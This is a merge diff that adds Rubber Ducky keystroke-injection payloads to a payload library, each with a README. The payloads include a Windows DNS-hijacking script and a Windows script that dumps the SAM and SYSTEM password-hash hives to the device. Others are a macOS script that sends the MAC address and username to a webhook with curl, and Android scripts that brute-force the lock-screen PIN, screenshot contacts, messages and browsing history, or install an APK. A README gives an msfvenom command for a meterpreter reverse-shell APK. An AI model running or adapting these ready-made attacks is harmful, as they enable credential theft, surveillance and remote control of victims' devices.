Merge 0d6f38865f into 5f13d6090f

DNS spoofer

payloads/library/execution/DNS_spoofer/README.md

@@ -0,0 +1,27 @@
+# Spoof DNS - Windows ✅
+
+DNS Spoofer
+
+## Description
+
+A payload used to alter the machine’s DNS settings, redirecting its DNS requests to an attacker-controlled server that can serve deceptive IP addresses for targeted domains.
+
+### Settings
+
+* Set the primary and secondary dns servers
+
+## Credits
+
+<h2 align="center"> Luu176 </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/luu176">
+        <img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/DNS_spoofer/payload.txt

@@ -0,0 +1,69 @@
+REM Title: DNS changer
+REM Author: luu176
+REM Description: Changes DNS address of windows machine in powershell
+REM Target: Windows 10/11
+
+REM wifi interface should be named: Wi-Fi
+DEFINE #interface Ethernet
+DEFINE #primaryDNS 192.168.1.3
+DEFINE #secondaryDNS 1.1.1.1
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+SAVE_HOST_KEYBOARD_LOCK_STATE
+GUI r
+DELAY 150
+STRINGLN powershell Start-Process powershell -Verb runAs
+DELAY 800
+ALT y
+DELAY 500
+STRINGLN Set-DnsClientServerAddress -InterfaceAlias "#interface" -ServerAddresses ("#primaryDNS", "#secondaryDNS"); exit
+REM below is to blink the LED when payload done
+VAR $i = 0
+WHILE ( $i < 9 )
+    DELAY 150
+    CAPSLOCK
+    $i = ( $i + 1 )
+END_WHILE
+RESTORE_HOST_KEYBOARD_LOCK_STATE

payloads/library/execution/Disable_WiFi-MacOS/README.md

@@ -0,0 +1,24 @@
+# Disable WiFi 🛜
+
+This payload is designed to turn off the Wi-Fi on a MacOS system. To turn the Wi-Fi back on, simply modify the script to replace "off" with "on".
+
+### Details
+
+- **Title**: Disable WiFi
+- **Author**: bst04 - Aleff
+- **Version**: 1.0
+- **Category**: Execution
+- **Target**: MacOS
+
+### Dependencies
+
+- REM Change the #MODE value to "on" if you want to run the WiFi, else leave it as "off"
+   `DEFINE #MODE off`
+
+## How It Works 📜
+
+1. Sets a user-defined modality (`#MODE`) to `on` or `off`.
+2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
+3. After readiness is confirmed, the script:
+   - Runs commands to open **Terminal**.
+   - Run or stop the WiFi

payloads/library/execution/Disable_WiFi-MacOS/payload.txt

@@ -0,0 +1,53 @@
+REM_BLOCK
+##################################
+#                                #
+# Title        : Disable WiFi    #
+# Author       : bst04 - Aleff   #
+# Version      : 1.0             #
+# Category     : Execution       #
+# Target       : MacOS           #
+#                                #
+##################################
+END_REM
+
+REM Change the #MODE value to "on" if you want to run the WiFi, else leave it as "off"
+DEFINE #MODE off
+
+EXTENSION DETECT_READY
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+
+        TARGETS:
+            Any system that reflects CAPSLOCK will detect minimum required delay
+            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #RESPONSE_DELAY 25
+    DEFINE #ITERATION_LIMIT 120
+
+    VAR $C = 0
+    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+        CAPSLOCK
+        DELAY #RESPONSE_DELAY
+        $C = ($C + 1)
+    END_WHILE
+    CAPSLOCK
+END_EXTENSION
+
+REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
+DELAY 200
+
+GUI SPACE
+DELAY 250
+STRINGLN TERMINAL
+DELAY 250
+STRINGLN networksetup -setnetworkserviceenabled Wi-Fi #MODE
+DELAY 250
+GUI q

payloads/library/exfiltration/Exfiltrate-Mac-Address-MacOS/README.md

@@ -0,0 +1,25 @@
+# Exfiltrate Mac Address - MacOS
+
+This payload is designed to retrieve the MAC address and username from a macOS system and send this information to a specified webhook.
+
+### Details
+
+- **Title**: Exfiltrate Mac Address
+- **Author**: bst04 - Aleff
+- **Version**: 1.0
+- **Category**: Exfiltration
+- **Target**: MacOS
+
+### Dependencies
+
+- Set the #WEBHOOK to complete the exfiltration
+   `DEFINE #WEBHOOK example`
+
+## How It Works 📜
+
+1. Sets a user-defined webhook (`#WEBHOOK`) to complete the exfiltration
+2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
+3. After readiness is confirmed, the script:
+   - Runs commands to open **Terminal**.
+   - Acquire the mac address and the system user name
+   - Send this informations through the Webhook

payloads/library/exfiltration/Exfiltrate-Mac-Address-MacOS/payload.txt

@@ -0,0 +1,55 @@
+REM_BLOCK
+####################################################
+#                                                  #
+# Title        : Exfiltrate Mac Address - MacOS    #
+# Author       : bst04 - Aleff                     #
+# Version      : 1.0                               #
+# Category     : Exfiltration                      #
+# Target       : MacOS                             #
+#                                                  #
+####################################################
+END_REM
+
+REM Set the #WEBHOOK to complete the exfiltration
+DEFINE #WEBHOOK example
+
+EXTENSION DETECT_READY
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+
+        TARGETS:
+            Any system that reflects CAPSLOCK will detect minimum required delay
+            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #RESPONSE_DELAY 25
+    DEFINE #ITERATION_LIMIT 120
+
+    VAR $C = 0
+    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+        CAPSLOCK
+        DELAY #RESPONSE_DELAY
+        $C = ($C + 1)
+    END_WHILE
+    CAPSLOCK
+END_EXTENSION
+
+REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
+DELAY 200
+
+GUI SPACE
+DELAY 250
+STRINGLN TERMINAL
+DELAY 750
+STRINGLN mac=$(networksetup -getmacaddress en0) 
+DELAY 750
+STRINGLN name=$(id -un)
+DELAY 850
+STRINGLN curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=User:$name | $mac" #WEBHOOK

payloads/library/exfiltration/NTLM_ducky/README.md

@@ -0,0 +1,29 @@
+# Exfiltrate NTLM Hash - Windows ✅
+
+A Rubber Ducky payload to exfiltrate NTLM hash files from a Windows machine onto the SD card.
+
+## Description
+
+This payload script captures and <strong>exfiltrates NTLM hash files</strong> from a Windows machine. It uses PowerShell commands to locate and save the SAM and SYSTEM files, which contain hashed user passwords, <strong><u>onto the Rubber Ducky's SD card</u></strong> for later extraction and analysis. Upon successful file extraction, <strong> the payload triggers a visual confirmation by <u>blinking the Caps Lock LED</u> </strong>
+
+
+### Settings
+
+- **Drive Label:** Set the target drive label for Rubber Ducky storage (default: `DUCKY`).
+- **Blink Count:** Adjust the number of Caps Lock LED blinks by setting the `#numBlinks` variable (default is 9 blinks).
+
+## Credits
+
+<h2 align="center"> Luu176 </h2>
+<div align="center">
+  <table>
+    <tr>
+      <td align="center" width="96">
+        <a href="https://github.com/luu176">
+          <img src="https://avatars.githubusercontent.com/u/112649910?v=4" width="48" height="48" />
+        </a>
+        <br>GitHub
+      </td>
+    </tr>
+  </table>
+</div>

payloads/library/exfiltration/NTLM_ducky/payload.txt

@@ -0,0 +1,81 @@
+REM_BLOCK
+TITLE           Exfiltrate NTLM Hash Files onto Ducky Storage
+AUTHOR          Luu176
+DESCRIPTION     This payload exfiltrates NTLM hash files (which contain hashed passwords for users 
+                on the current Windows device) to the Rubber Ducky's SD card for further analysis. 
+                It utilizes PowerShell commands to locate and save NTLM files (SAM and SYSTEM) to 
+                the defined storage drive on the Ducky device.
+END_REM
+
+DEFINE #driveLabel DUCKY
+REM below you can set the number of blinks for the caps lock when finished (default 9)
+DEFINE #numBlinks 9
+
+ATTACKMODE HID STORAGE
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+SAVE_HOST_KEYBOARD_LOCK_STATE
+IF ($_CAPSLOCK_ON == TRUE)
+    CAPSLOCK
+END_IF
+GUI d
+DELAY 1000
+GUI r
+DELAY 500
+STRINGLN powershell Start-Process powershell -Verb runAs
+DELAY 800
+ALT y
+DELAY 800
+STRINGLN cd (gwmi win32_volume -f 'label=''#driveLabel''').Name;reg save hklm\sam SAM;reg save hklm\system SYS;(New-Object -ComObject wscript.shell).SendKeys('{CAPSLOCK}');exit
+GUI d
+WAIT_FOR_CAPS_ON 
+REM once finished downloading SAM and SYSTEM, caps lock LED turn on and then flash (note: may take a couple minutes max to download)
+VAR $i = 0
+WHILE ( $i < #numBlinks )
+    DELAY 150
+    CAPSLOCK
+    $i = ( $i + 1 )
+END_WHILE
+RESTORE_HOST_KEYBOARD_LOCK_STATE

payloads/library/mobile/Android/ANDROID_BLANKET_PARTY/Bruteforce_Cracker/Pin-Crack.txt

@@ -0,0 +1,190 @@
+REM #TITLE: Android 13 Payload
+REM #AUTHOR: $@LVAT10N!
+REM #DESCRIPTION: Android payload to support android 13. This payload will 
+REM # brute force a 4 digit pin. The first five strings you can add possible 
+REM # pins gathered from recon data by replacing the x's with pins or delete 
+REM # these lines if you just want random generated pins.The pin length can be 
+REM # modified by X string length and adding addtional "RANDOM_NUMBER" entries 
+REM # below to increase the length of the random pins that are generated.
+REM # This is a run once script intended for engagements.
+DELAY 3000
+ATTACKMODE HID
+REM # Scroll up, wake screen and start cracking
+SPACE
+DELAY 100
+SPACE
+DELAY 1000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING x
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 32000
+SPACE
+DELAY 100
+SPACE
+DELAY 100
+SPACE
+DELAY 100
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 32000
+SPACE
+DELAY 100
+SPACE
+DELAY 100
+SPACE
+DELAY 100
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 60000
+SPACE
+DELAY 100
+SPACE
+DELAY 100
+SPACE
+DELAY 100
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 60000
+DELAY 60000
+SPACE
+DELAY 100
+SPACE
+DELAY 100
+SPACE
+DELAY 100
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER

payloads/library/mobile/Android/ANDROID_BLANKET_PARTY/PRANKS/CHANGE-LANUAGES.txt

@@ -0,0 +1,126 @@
+REM #TITLE: Android 13 Payload
+REM #AUTHOR: $@LVAT10N!
+REM #DESCRIPTION: Android payload to support android 13. This payload will 
+REM # brute force a pin and change the default language on the target device 
+REM # Once the pin is cracked click the ducky button once to start the payload
+
+BUTTON_DEF
+ATTACKMODE HID 
+DELAY 2000
+REM # Navigate to home screen
+GUI ENTER
+DELAY 2000
+REM # move to settings menu
+GUI z
+DELAY 1000
+REM Search for general management
+ENTER
+DELAY 1000
+STRING general management
+DELAY 1000
+REM # Select general management
+
+VAR $FIND = 4
+WHILE ( $FIND > 0 )
+    TAB
+    DELAY 200
+    $FIND = ( $FIND - 1 )
+END_WHILE
+
+ENTER
+DELAY 1000
+REM # Select language
+DOWNARROW
+DELAY 200
+DOWNARROW
+DELAY 200
+ENTER
+REM # Select "ADD language"
+DELAY 200
+DOWNARROW
+DELAY 200
+DOWNARROW
+ENTER
+DELAY 1000
+REM # Select language To change to
+VAR $CHANGE = 5
+WHILE ( $CHANGE > 0 )
+    DOWNARROW
+    DELAY 200
+    $CHANGE = ( $CHANGE - 1 )
+END_WHILE
+
+DELAY 200
+ENTER
+REM # Set as default
+DELAY 200
+ENTER
+DELAY 200
+REM # Go home
+GUI ENTER
+DELAY 1000
+REM # Delete all recent tabs that were opened on the device
+
+VAR $WIPE = 8
+WHILE ( $WIPE > 0 )
+    ALT TAB
+    DELAY 100
+    ALT F4
+    DELAY 100
+    $WIPE = ( $WIPE - 1 )
+END_WHILE
+REM # If not already at the home screen, going to home screen
+DELAY 1000
+GUI ENTER
+REM # Locking the device back up
+DELAY 1000
+GUI l
+DELAY 100
+REM # Turning attackmode off
+ATTACKMODE OFF
+DELAY 1000
+END_BUTTON
+
+DELAY 3000
+REM # Scroll up, wake screen and start cracking
+REM # The first five strings you can add possible pins gathered from recon 
+REM # data by replacing the x's with pins or delete these lines, this 
+REM # payload is for a 4 digit pin. The pin length can be modified by X string
+REM # length and adding addtional "RANDOM_NUMBER" entries below to increase
+REM # the length of the random pins that are generated.
+ATTACKMODE HID
+DELAY 100
+SPACE
+DELAY 100
+SPACE
+DELAY 1000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 32000

payloads/library/mobile/Android/ANDROID_BLANKET_PARTY/README.md

@@ -0,0 +1,26 @@
+# ANDROID_BLANKET_PARTY
+This repository houses all my Android Rubber Ducky payloads, most of these payloads will also work with a O.MG cable 
+
+//BLANKET PArty as in that iconic scene from "FUll MEtal Jacket"//
+![image](https://github.com/salvat1on/ANDROID_BLANKET_PARTY/assets/27372029/4ca1e4a8-846d-4da1-b140-8399392bd945)
+
+Swipe-to-open.txt will install an apk to the target device that resides in the ducky storage.
+
+The [STAND-ALONE] Pin / Password lockscreen brute force payloads will also be included in 
+this Repository.
+
+You can create an APK Payload with metasploit with the following command in the terminal
+
+msfvenom -p android/meterpreter_reverse_tcp LHOST=YOUR_ADDRESS LPORT=5555 -o WHATEVER_NAME.apk
+
+The APK file must then be copied to the ducky along side the bin file you place there as well.
+
+The APK payloads rely on a bug I found and will be reporting soon, within the APP install process
+
+[SWIPE TO OPEN DEMO]
+
+[![IMAGE ALT TEXT HERE](https://i.ibb.co/Yh2D6Vt/swipe.png)](https://youtu.be/Hon9YmdVehQ)
+
+[PIN CRACKER DEMO]
+
+[![IMAGE ALT TEXT HERE](https://i.ibb.co/gJKgg6b/pin-crack.png)](https://youtube.com/shorts/jV1f7E00P_g)

payloads/library/mobile/Android/ANDROID_BLANKET_PARTY/Recon/Blanket_Party_Recon.txt

@@ -0,0 +1,457 @@
+REM #TITLE: Android 13 Payload
+REM #AUTHOR: $@LVAT10N!
+REM #DESCRIPTION: Android payload to support android 13. This payload will 
+REM # brute force a 4 digit pin and take 10 screenshots of contacts, 10
+REM # screenshots of text logs, 5 screenshots of the browser history,
+REM # one screenshot of notifications, one screenshot of current email,
+REM # and 1 screenshot of the last number called. Then move all 
+REM # screenshots to the ducky storage. Once the pin is cracked press the
+REM # ducky button once to start stage 2 of the payload ( gathering INTEL) 
+REM # If you would like to add more pin guesses and pin randomization consider 
+REM # replacing the bottom of this script with my "pin-crack" attack. This
+REM # script is intended to give you 5 attempts with pins you have gathered
+REM # from recon.This attack will take all screenshots on the device, not
+REM # just the ones the ducky takes, 50% of screenshots are accidents the other
+REM # 50% are important things that cannot be forgotten. Make sure your ducky
+REM # has enough storage to accomidate this attack.
+BUTTON_DEF
+ATTACKMODE HID STORAGE
+DELAY 2000
+REM # If not at homescreen going home
+GUI ENTER
+DELAY 1000
+REM # Open phone
+GUI f
+DELAY 1000
+STRING phone
+DELAY 1000
+ENTER
+DELAY 200
+ENTER
+DELAY 1500
+REM # Pull up last number dialed
+ENTER
+DELAY 1000
+ALT PRINTSCREEN
+DELAY 1000
+REM # closing out screenshot window
+ESC
+DELAY 500
+REM # Going to homescreen
+GUI ENTER
+DELAY 1000
+REM # open notifications
+GUI n
+DELAY 1000
+REM # Take screenshot
+ALT PRINTSCREEN
+DELAY 1000
+ESC 
+DELAY 500
+REM # Going back to homescreen
+GUI ENTER
+DELAY 1000
+REM # Open email
+GUI e
+DELAY 2000
+REM # Take screenshot of recent inbox
+ALT PRINTSCREEN
+DELAY 1000
+ESC
+DELAY 500
+REM # Going back to homescreen
+GUI ENTER
+DELAY 1000
+REM # Open browser 
+GUI b
+DELAY 3000
+REM # Open browser menu , select history and open
+MENU
+DELAY 200
+DOWNARROW
+DELAY 200
+DOWNARROW
+DELAY 200
+DOWNARROW
+DELAY 200
+DOWNARROW
+DELAY 200
+ENTER
+REM # Start taking screenshots of browser history
+DELAY 1000
+ALT PRINTSCREEN
+REM # Clearing screenshot window so scrolling can continue
+DELAY 500
+ESC
+DELAY 200
+PAGEDOWN
+DELAY 200
+VAR $FALL = 10
+WHILE ( $FALL > 0 )
+    DOWNARROW
+    DELAY 200
+    $FALL = ( $FALL - 1 )
+END_WHILE
+
+DELAY 1000
+ALT PRINTSCREEN
+REM # Clearing screenshot window so scrolling can continue
+DELAY 500
+ESC
+
+VAR $FALL = 10
+WHILE ( $FALL > 0 )
+    DOWNARROW
+    DELAY 200
+    $FALL = ( $FALL - 1 )
+END_WHILE
+
+DELAY 1000
+ALT PRINTSCREEN
+REM # Clearing screenshot window so scrolling can continue
+DELAY 500
+ESC
+
+VAR $FALL = 10
+WHILE ( $FALL > 0 )
+    DOWNARROW
+    DELAY 200
+    $FALL = ( $FALL - 1 )
+END_WHILE
+
+DELAY 1000
+ALT PRINTSCREEN
+REM # Clearing screenshot window so scrolling can continue
+DELAY 500
+ESC
+
+VAR $FALL = 10
+WHILE ( $FALL > 0 )
+    DOWNARROW
+    DELAY 200
+    $FALL = ( $FALL - 1 )
+END_WHILE
+
+DELAY 1000
+ALT PRINTSCREEN
+REM # Clearing screenshot window so scrolling can continue
+DELAY 500
+ESC
+
+VAR $FALL = 10
+WHILE ( $FALL > 0 )
+    DOWNARROW
+    DELAY 200
+    $FALL = ( $FALL - 1 )
+END_WHILE
+
+DELAY 1000
+ALT PRINTSCREEN
+REM # Clearing screenshot window so scrolling can continue
+DELAY 500
+ESC
+DELAY 1000
+REM # Returning to Homescreen
+GUI ENTER
+DELAY 1000
+REM # Jump to messages, take screenshot - scroll, rinse and repeat
+GUI s
+DELAY 1000
+DOWNARROW
+DELAY 200
+DOWNARROW
+DELAY 200
+ALT PRINTSCREEN
+DELAY 1000
+REM # Closing out screenshot share window
+ESC
+DELAY 500
+
+VAR $DIP = 15
+WHILE ( $DIP > 0 )
+    DOWNARROW
+    DELAY 200
+    $DIP = ( $DIP - 1 )
+END_WHILE
+
+ALT PRINTSCREEN
+DELAY 1000
+REM # Closing out screenshot share window
+ESC
+DELAY 500
+
+VAR $TRIP = 8
+WHILE ( $TRIP > 0 )
+    DOWNARROW
+    DELAY 200
+    $TRIP = ( $TRIP - 1 )
+END_WHILE
+
+ALT PRINTSCREEN
+DELAY 1000
+REM # Closing out screenshot share window
+ESC
+DELAY 500
+
+VAR $TRIP = 8
+WHILE ( $TRIP > 0 )
+    DOWNARROW
+    DELAY 200
+    $TRIP = ( $TRIP - 1 )
+END_WHILE
+
+ALT PRINTSCREEN
+DELAY 1000
+REM # Closing out screenshot share window
+ESC
+DELAY 500
+
+VAR $TRIP = 8
+WHILE ( $TRIP > 0 )
+    DOWNARROW
+    DELAY 200
+    $TRIP = ( $TRIP - 1 )
+END_WHILE
+
+ALT PRINTSCREEN
+DELAY 1000
+REM # Closing out screenshot share window
+ESC
+DELAY 500
+
+VAR $TRIP = 8
+WHILE ( $TRIP > 0 )
+    DOWNARROW
+    DELAY 200
+    $TRIP = ( $TRIP - 1 )
+END_WHILE
+
+ALT PRINTSCREEN
+DELAY 1000
+REM # Closing out screenshot share window
+ESC
+DELAY 500
+
+VAR $TRIP = 8
+WHILE ( $TRIP > 0 )
+    DOWNARROW
+    DELAY 200
+    $TRIP = ( $TRIP - 1 )
+END_WHILE
+
+ALT PRINTSCREEN
+DELAY 1000
+REM # Closing out screenshot share window
+ESC
+DELAY 500
+
+VAR $TRIP = 8
+WHILE ( $TRIP > 0 )
+    DOWNARROW
+    DELAY 200
+    $TRIP = ( $TRIP - 1 )
+END_WHILE
+
+ALT PRINTSCREEN
+DELAY 1000
+REM # Closing out screenshot share window
+ESC
+DELAY 500
+
+VAR $TRIP = 8
+WHILE ( $TRIP > 0 )
+    DOWNARROW
+    DELAY 200
+    $TRIP = ( $TRIP - 1 )
+END_WHILE
+
+ALT PRINTSCREEN
+DELAY 1000
+REM # Closing out screenshot share window
+ESC
+DELAY 500
+
+VAR $TRIP = 8
+WHILE ( $TRIP > 0 )
+    DOWNARROW
+    DELAY 200
+    $TRIP = ( $TRIP - 1 )
+END_WHILE
+
+ALT PRINTSCREEN
+DELAY 2000
+REM # Closing out screenshot share window
+ESC
+DELAY 1000
+REM # Going home
+GUI ENTER
+DELAY 1000
+REM # Jump to contacts, take screenshot - scroll, rinse and repeat
+GUI c
+DELAY 1000
+DOWNARROW
+DELAY 1000
+ALT PRINTSCREEN
+DELAY 1000
+REM # Escape is used to close out the window opened after a screenshot is taken
+ESC
+
+VAR $CONTACTS = 9
+WHILE ( $CONTACTS > 0 )
+    DELAY 200
+    PAGEDOWN
+    DELAY 1000
+    ALT PRINTSCREEN
+    DELAY 1000
+    ESC
+    $CONTACTS = ( $CONTACTS - 1 )
+END_WHILE
+
+DELAY 1000
+REM # Jump to file manager, find screenshots folder and move there
+GUI r
+DELAY 200
+REM # Search for recent screenshots
+DELAY 200
+ENTER
+DELAY 200
+ENTER
+DELAY 1000
+REM # Reset keyboard for good measure
+RESET
+DELAY 500
+STRING screenshot
+DELAY 1000
+ENTER
+DELAY 200
+REM # Select all screenshots
+CTRL a
+REM # Select the "move" option
+DELAY 1000
+PAGEDOWN
+DELAY 200
+DOWNARROW
+DELAY 200
+DOWNARROW
+DELAY 200
+DOWNARROW
+DELAY 200
+LEFTARROW
+DELAY 200
+LEFTARROW
+DELAY 200
+ENTER
+REM # Select the ducky storage as the move location
+REM # Jump to previous window
+DELAY 1000
+TAB
+DELAY 200
+ENTER
+REM # Jump to previous window
+DELAY 1000
+LEFTARROW
+DELAY 200
+ENTER
+REM # Select ducky storage
+
+VAR $HOP = 5
+WHILE ( $HOP > 0 )
+    DELAY 200
+    DOWNARROW
+    $HOP = ( $HOP - 1 )
+END_WHILE
+
+ENTER
+REM # In ducky storage, select "move here"
+DELAY 200
+PAGEDOWN
+DELAY 200
+DOWNARROW
+DELAY 200
+DOWNARROW
+DELAY 200
+DOWNARROW
+DELAY 200
+RIGHTARROW
+DELAY 200
+RIGHTARROW
+DELAY 200
+ENTER
+REM # Returning to home
+DELAY 1000
+GUI ENTER
+DELAY 200
+REM # Start cleaning up and reduce footprint 
+REM # Open and close out most recent tabs on the device
+
+VAR $WIPE = 8
+WHILE ( $WIPE > 0 )
+    ALT TAB
+    DELAY 200
+    ALT F4
+    DELAY 200
+    $WIPE = ( $WIPE - 1 )
+END_WHILE
+
+DELAY 200
+GUI ENTER
+DELAY 1000
+REM # Clear device notifications
+GUI n
+DELAY 500
+UPARROW
+DELAY 100
+RIGHTARROW
+DELAY 100
+ENTER
+DELAY 1000
+REM # Return home
+GUI ENTER
+DELAY 1000
+REM # Lock device and turn attackmode off
+GUI l
+DELAY 300
+ATTACKMODE OFF
+END_BUTTON
+
+DELAY 3000
+REM # Scroll up, wake screen and start cracking
+REM # The first five strings you can add possible pins gathered from recon 
+REM # data by replacing the x's with pins. This payload is for a 4 digit pin. 
+REM # The pin length can be modified by increasing X string length 
+ATTACKMODE HID
+DELAY 100
+SPACE
+DELAY 100
+SPACE
+DELAY 1000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 32000

payloads/library/mobile/Android/ANDROID_BLANKET_PARTY/swipe-to-open.txt

@@ -0,0 +1,126 @@
+REM #TITLE: Android 13 Payload
+REM #AUTHOR: $@LVAT10N!
+REM #DESCRIPTION: Android payload to support android 13. This payload will 
+REM # install an apk to the target device that resides in the ducky storage.
+REM # Payload is for device with "swipe to unlock" lockscreen, no pin or password enabled
+
+DELAY 3000
+ATTACKMODE HID STORAGE
+REM # scroll up to unlock device
+SPACE
+DELAY 100
